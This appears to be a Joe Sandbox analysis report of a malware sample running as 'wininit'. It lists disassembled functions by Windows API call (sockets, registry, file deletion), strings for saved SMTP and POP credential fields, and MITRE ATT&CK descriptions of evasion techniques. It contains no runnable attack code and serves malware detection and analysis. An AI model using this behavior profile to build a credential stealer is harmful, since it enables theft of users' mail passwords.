Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Function 004049B3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 004049DC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00408B2C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 004044EE Relevance: 1.3, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopPort, xrefs: 0040D0A7
SmtpPassword, xrefs: 0040D117
SmtpServer, xrefs: 0040D0DC
PopPassword, xrefs: 0040D0D0
EmailAddress, xrefs: 0040D074
PopAccount, xrefs: 0040D0B6
PopServer, xrefs: 0040D099
SmtpAccount, xrefs: 0040D0FA
SmtpPort, xrefs: 0040D0EB
Technology, xrefs: 0040D08D

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 3660427363-2111798378
Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

